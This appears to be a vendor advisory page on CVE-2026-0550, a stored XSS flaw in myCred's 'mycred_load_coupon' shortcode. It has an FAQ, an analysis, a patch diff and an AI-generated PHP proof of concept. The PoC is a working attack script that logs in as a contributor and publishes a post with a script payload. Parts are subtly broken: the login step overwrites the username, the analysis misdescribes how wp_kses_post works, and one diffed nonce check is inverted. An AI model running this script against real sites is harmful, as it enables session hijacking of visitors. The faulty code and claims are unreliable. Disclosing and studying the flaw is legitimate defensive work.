What is CVE-2026-0550?

CVE-2026-0550 is a stored Cross-Site Scripting (XSS) vulnerability in the myCred plugin for WordPress. It allows authenticated users with contributor-level access and above to inject malicious scripts via the ‘mycred_load_coupon’ shortcode, which can execute when other users view the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the ‘mycred_load_coupon’ shortcode. An attacker can create or edit posts containing this shortcode with malicious attributes, leading to script execution in the browser of any user who views the page.

Who is affected by this vulnerability?

Any WordPress site using the myCred plugin version 2.9.7.3 or earlier is vulnerable. Specifically, users with contributor-level permissions or higher can exploit this vulnerability by injecting malicious scripts into posts.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the myCred plugin installed on your WordPress site. If it is version 2.9.7.3 or earlier, your site is vulnerable. Additionally, review posts for any use of the ‘mycred_load_coupon’ shortcode that may contain untrusted input.

How can I fix CVE-2026-0550?

The vulnerability is fixed in myCred version 2.9.7.4. To mitigate the issue, update the myCred plugin to the latest version as soon as possible. Regularly check for updates to ensure your plugins are secure.

What does the CVSS score of 6.4 mean?

A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to exploitation if not addressed, especially since it requires authenticated access.

What are the practical risks of this vulnerability?

Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of any user viewing the affected page. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites.

How does the proof of concept demonstrate the issue?

The proof of concept illustrates how an authenticated contributor can inject a malicious payload into a post using the ‘mycred_load_coupon’ shortcode. It shows the steps to log in, create a post with the malicious shortcode, and how this payload executes in the browser of any user who views the post.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the myCred plugin to prevent exploitation. Additionally, review user permissions and limit access to contributor-level users until the plugin can be updated.

Are there any additional security measures I should take?

In addition to updating the plugin, ensure that your WordPress installation and all other plugins and themes are up to date. Implement security best practices such as using strong passwords, enabling two-factor authentication, and regularly monitoring user activity.

How can I report further vulnerabilities?

If you discover additional vulnerabilities, report them to the plugin developers or through a responsible disclosure program. Providing detailed information and potential impact helps improve the security of the WordPress ecosystem.

Where can I find more information about CVE-2026-0550?

More information about CVE-2026-0550 can be found on the official CVE database, security advisories from the myCred developers, and security-focused websites that analyze vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-0550: myCred <= 2.9.7.3 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'mycred_load_coupon' Shortcode (mycred)

CVE ID CVE-2026-0550

Plugin mycred

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 2.9.7.3

Patched Version 2.9.7.4

Disclosed February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-0550:
The myCred WordPress plugin contains an authenticated stored Cross-Site Scripting (XSS) vulnerability in versions up to and including 2.9.7.3. The vulnerability exists within the ‘mycred_load_coupon’ shortcode handler, allowing contributors and higher-privileged users to inject malicious scripts into pages. This vulnerability has a CVSS score of 6.4 (Medium severity).

Atomic Edge research identifies the root cause as insufficient output escaping of user-supplied shortcode attributes. The vulnerable code resides in the file mycred/addons/coupons/includes/mycred-coupon-shortcodes.php. Specifically, the function handling the ‘mycred_load_coupon’ shortcode fails to properly sanitize the ‘label’ parameter before output. The code directly concatenates user input into HTML output without escaping, as shown in the diff at lines 82-85 where the ‘label’ variable is used without security filtering.

The exploitation method requires an authenticated attacker with at least contributor-level permissions. Attackers can create or edit posts containing the ‘mycred_load_coupon’ shortcode with malicious attributes. For example, an attacker could embed a payload like [mycred_load_coupon label=”alert(document.domain)”]. When any user views the compromised page, the malicious script executes in their browser context. The attack vector leverages WordPress’s shortcode parsing system, which processes these attributes during page rendering.

The patch adds proper output escaping using wp_kses_post() for both the error message and label parameters. In the diff, line 51 shows the addition of wp_kses_post($message) to sanitize error messages. Lines 82-85 demonstrate the addition of wp_kses_post($label) before the label is wrapped in HTML tags. These changes ensure that any HTML special characters in user input are properly encoded before being output to the browser, preventing script execution while preserving intended formatting.

Successful exploitation allows attackers to execute arbitrary JavaScript in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since the vulnerability requires contributor-level access, attackers must first compromise a user account with appropriate permissions, but once injected, the payload affects all visitors to the page.

Differential between vulnerable and patched code

Code Diff

--- a/mycred/addons/badge-plus/includes/badge-plus-module-class.php
+++ b/mycred/addons/badge-plus/includes/badge-plus-module-class.php
@@ -450,7 +450,8 @@
             array(
                 'requirement_template' => $mycred_badge_requirement_template,
                 'event_templates' => $badge_event_templates,
-                'post_id' => get_the_ID()
+                'post_id' => get_the_ID(),
+                'nonce'   => wp_create_nonce( 'mycred-badge-plus-nonce' )
             )
         );
     }
@@ -670,7 +671,7 @@

         if ( ! empty( $type[0]->term_id ) ) {

-            if( ! isset( $_POST['mycred-badgeplus-nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['mycred-badgeplus-nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            if( isset( $_POST['mycred-badgeplus-nonce'] ) && wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['mycred-badgeplus-nonce'] ) ), 'mycredbadgeplus-nonce' ) ) {
                 $amount = isset( $_POST['mycred_points_badge_plus'] ) ? intval( $_POST['mycred_points_badge_plus'] ) : 0;
                 mycred_update_post_meta( $post_id , 'mycred_points_badge_plus', $amount );

@@ -826,6 +827,13 @@
     public function badge_plus_user_screen( $user ) {

         wp_enqueue_script( 'mycred-badge-plus-admin' );
+        wp_localize_script(
+            'mycred-badge-plus-admin',
+            'mycred_badge_plus_localize_data',
+            array(
+                'nonce' => wp_create_nonce( 'mycred-badge-plus-nonce' )
+            )
+        );
         $user_id    = $user->ID;
         $earned     = mycred_get_user_meta( $user_id, 'mycred_badge_plus_ids', '', true );

@@ -973,25 +981,31 @@
     /**
      * revoke user badge
      * @since 2.5
-     * @version 1.0
+     * @version 1.1
      */
     public function mycred_revoke_user_badge() {

-        if( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
-            $badge_id           = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
-            $user_id            = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
-            $earned             = isset( $_POST['earned'] ) ? absint( $_POST['earned'] ) : 0;
-            $users_badges       = mycred_get_users_earned_badge_plus( $user_id );
-
-            if( in_array( $earned, $users_badges ) ) {
+        if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
+        }

-                $badge = mycred_badge_plus_object($badge_id);
-                $badge->divest( $user_id, $earned );
-                $msg = 'removed';
-            }else{
-                $msg = 'no badge';
-            }
+        if ( ! mycred_is_admin() ) {
+            wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
+        }
+
+        $badge_id     = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
+        $user_id      = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
+        $earned       = isset( $_POST['earned'] ) ? absint( $_POST['earned'] ) : 0;
+        $users_badges = mycred_get_users_earned_badge_plus( $user_id );
+
+        if ( in_array( $earned, $users_badges ) ) {
+
+            $badge = mycred_badge_plus_object($badge_id);
+            $badge->divest( $user_id, $earned );
+            $msg = 'removed';

+        } else {
+            $msg = 'no badge';
         }

         wp_send_json( array(
@@ -1004,44 +1018,55 @@
     /**
      * assign user badge
      * @since 2.5
-     * @version 1.0
+     * @version 1.1
      */
     public function mycred_assign_user_badge() {

         // Verify nonce
         if ( ! isset( $_POST['nonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_POST['nonce'] ) ), 'mycred-badge-plus-nonce' ) ) {
+            wp_send_json_error( array( 'message' => 'Invalid nonce' ), 403 );
+        }

-            // Extract data
-            $badge_id = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
-            $user_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;
-
-            if ( ! $badge_id || ! $user_id ) {
-                wp_send_json_error( array( 'message' => 'Missing badge or user information.' ), 400 );
-            }
+        if ( ! mycred_is_admin() ) {
+            wp_send_json_error( array( 'message' => 'Permission denied' ), 403 );
+        }

-            // Get badge object
-            $badge = mycred_badge_plus_object( $badge_id );
+        // Extract data
+        $badge_id = isset( $_POST['postid'] ) ? absint( $_POST['postid'] ) : 0;
+        $user_id  = isset( $_POST['user_id'] ) ? absint( $_POST['user_id'] ) : 0;

-            if ( ! $badge ) {
-                wp_send_json_error( array( 'message' => 'Invalid badge.' ), 404 );
-            }
+        if ( ! $badge_id || ! $user_id ) {
+            wp_send_json_error( array( 'message' => 'Missing badge or user information.' ), 400 );
+        }

-            // Assign badge
-            $title  = $badge->title;
-            $amount = $badge->points_award;
-            $date   = wp_date( 'F d Y h:i A', time() );
-            $msg    = 'assign';
-
-            // Handle reassignment
-            if ( $badge->user_has_badge( $user_id, $badge_id ) ) {
-                return;
-
-            }
+        // Get badge object
+        $badge = mycred_badge_plus_object( $badge_id );

-            $badge->assign( $user_id, $badge_id );
+        if ( ! $badge ) {
+            wp_send_json_error( array( 'message' => 'Invalid badge.' ), 404 );
+        }

+        // Assign badge
+        $title  = $badge->title;
+        $amount = $badge->points_award;
+        $date   = wp_date( 'F d Y h:i A', time() );
+        $msg    = 'assign';
+
+        // Handle reassignment
+        if ( $badge->user_has_badge( $user_id, $badge_id ) ) {
+            wp_send_json_success( array(
+                'badge_id' => $badge_id,
+                'user_id'  => $user_id,
+                'earned'   => time(),
+                'title'    => $title,
+                'amount'   => $amount,
+                'date'     => $date,
+                'assign'   => 'already has badge'
+            ), 200 );
         }

+        $badge->assign( $user_id, $badge_id );
+
         // Return success response
         wp_send_json_success( array(
             'badge_id' => $badge_id,
--- a/mycred/addons/coupons/includes/mycred-coupon-shortcodes.php
+++ b/mycred/addons/coupons/includes/mycred-coupon-shortcodes.php
@@ -50,7 +50,7 @@

 					$message = mycred_get_coupon_error_message( $load, $coupon );
 					$message = $mycred->template_tags_general( $message );
-					$output .= '<div class="alert alert-danger">' . $message . '</div>';
+					$output .= '<div class="alert alert-danger">' . wp_kses_post( $message ) . '</div>';

 				}

@@ -80,8 +80,10 @@

 		}

-		if ( $label != '' )
+		if ( $label != '' ) {
+			$label = wp_kses_post( $label );
 			$label = '<label for="mycred-coupon-code">' . $label . '</label>';
+		}

 		$output .= '
 	<form action="" method="post" class="form-inline">
--- a/mycred/mycred.php
+++ b/mycred/mycred.php
@@ -3,7 +3,7 @@
  * Plugin Name: myCred
  * Plugin URI: https://mycred.me
  * Description: An adaptive points management system for WordPress powered websites.
- * Version: 2.9.7.3
+ * Version: 2.9.7.4
  * Tags: point, credit, loyalty program, engagement, reward, woocommerce rewards
  * Author: myCred
  * Author URI: https://mycred.me
@@ -20,7 +20,7 @@
 	final class myCRED_Core {

 		// Plugin Version
-		public $version             = '2.9.7.3';
+		public $version             = '2.9.7.4';

 		// Instnace
 		protected static $_instance = NULL;

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0550 - myCred <= 2.9.7.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'mycred_load_coupon' Shortcode

<?php
/**
 * Proof of Concept for CVE-2026-0550
 * Demonstrates stored XSS via myCred plugin's mycred_load_coupon shortcode
 * Requires contributor-level WordPress credentials
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Payload to inject via shortcode label attribute
$xss_payload = '<script>alert("Atomic Edge XSS Test: " + document.domain)</script>';

// Create a new post with malicious shortcode
$post_data = array(
    'title' => 'Test Post with XSS',
    'content' => '[mycred_load_coupon label="' . $xss_payload . '"]',
    'status' => 'publish'
);

// Initialize cURL session for login
$ch = curl_init();

// First, get the login page to obtain nonce/cookies
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
$response = curl_exec($ch);

// Extract login nonce (if present)
preg_match('/name="log" value="([^"]*)"/', $response, $matches);
$login_nonce = $matches[1] ?? '';

// Perform login
$login_fields = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

if ($login_nonce) {
    $login_fields['log'] = $login_nonce;
}

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$login_response = curl_exec($ch);

// Verify login success by checking for admin bar or dashboard
if (strpos($login_response, 'wp-admin-bar') === false && strpos($login_response, 'Dashboard') === false) {
    echo "Login failed. Check credentials.n";
    curl_close($ch);
    exit;
}

echo "Successfully logged in as contributor.n";

// Now create the malicious post
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post-new.php');
curl_setopt($ch, CURLOPT_POST, false);
$post_page = curl_exec($ch);

// Extract post creation nonce
preg_match('/name="_wpnonce" value="([^"]*)"/', $post_page, $matches);
$post_nonce = $matches[1] ?? '';

if (empty($post_nonce)) {
    echo "Failed to obtain post creation nonce.n";
    curl_close($ch);
    exit;
}

// Prepare post creation request
$create_post_fields = array(
    'post_title' => $post_data['title'],
    'content' => $post_data['content'],
    'post_status' => $post_data['status'],
    '_wpnonce' => $post_nonce,
    '_wp_http_referer' => $target_url . '/wp-admin/post-new.php',
    'post_type' => 'post',
    'original_post_status' => 'auto-draft',
    'save' => 'Publish',
    'publish' => 'Publish'
);

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/post.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($create_post_fields));
$create_response = curl_exec($ch);

// Extract post ID from response
preg_match('/post=([0-9]+)&action=edit/', $create_response, $matches);
$post_id = $matches[1] ?? '';

if ($post_id) {
    echo "Malicious post created successfully. Post ID: " . $post_id . "n";
    echo "Visit: " . $target_url . "/?p=" . $post_id . " to trigger XSSn";
    echo "The page will contain: [mycred_load_coupon label="" . htmlspecialchars($xss_payload) . ""]n";
} else {
    echo "Post creation may have failed. Check response.n";
}

curl_close($ch);

// Clean up cookie file
if (file_exists('cookies.txt')) {
    unlink('cookies.txt');
}

?>

Frequently Asked Questions

What is CVE-2026-0550?
Overview of the vulnerability
CVE-2026-0550 is a stored Cross-Site Scripting (XSS) vulnerability in the myCred plugin for WordPress. It allows authenticated users with contributor-level access and above to inject malicious scripts via the ‘mycred_load_coupon’ shortcode, which can execute when other users view the affected pages.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of user-supplied attributes in the ‘mycred_load_coupon’ shortcode. An attacker can create or edit posts containing this shortcode with malicious attributes, leading to script execution in the browser of any user who views the page.
Who is affected by this vulnerability?
Identifying vulnerable users and sites
Any WordPress site using the myCred plugin version 2.9.7.3 or earlier is vulnerable. Specifically, users with contributor-level permissions or higher can exploit this vulnerability by injecting malicious scripts into posts.
How can I check if my site is vulnerable?
Steps for verification
To check for vulnerability, verify the version of the myCred plugin installed on your WordPress site. If it is version 2.9.7.3 or earlier, your site is vulnerable. Additionally, review posts for any use of the ‘mycred_load_coupon’ shortcode that may contain untrusted input.
How can I fix CVE-2026-0550?
Updating the plugin
The vulnerability is fixed in myCred version 2.9.7.4. To mitigate the issue, update the myCred plugin to the latest version as soon as possible. Regularly check for updates to ensure your plugins are secure.
What does the CVSS score of 6.4 mean?
Understanding risk levels
A CVSS score of 6.4 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could lead to exploitation if not addressed, especially since it requires authenticated access.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
Exploitation of this vulnerability can allow attackers to execute arbitrary JavaScript in the context of any user viewing the affected page. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites.
How does the proof of concept demonstrate the issue?
Explanation of the provided PoC
The proof of concept illustrates how an authenticated contributor can inject a malicious payload into a post using the ‘mycred_load_coupon’ shortcode. It shows the steps to log in, create a post with the malicious shortcode, and how this payload executes in the browser of any user who views the post.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the myCred plugin to prevent exploitation. Additionally, review user permissions and limit access to contributor-level users until the plugin can be updated.
Are there any additional security measures I should take?
Enhancing overall WordPress security
In addition to updating the plugin, ensure that your WordPress installation and all other plugins and themes are up to date. Implement security best practices such as using strong passwords, enabling two-factor authentication, and regularly monitoring user activity.
How can I report further vulnerabilities?
Responsible disclosure practices
If you discover additional vulnerabilities, report them to the plugin developers or through a responsible disclosure program. Providing detailed information and potential impact helps improve the security of the WordPress ecosystem.
Where can I find more information about CVE-2026-0550?
Resources for further reading
More information about CVE-2026-0550 can be found on the official CVE database, security advisories from the myCred developers, and security-focused websites that analyze vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations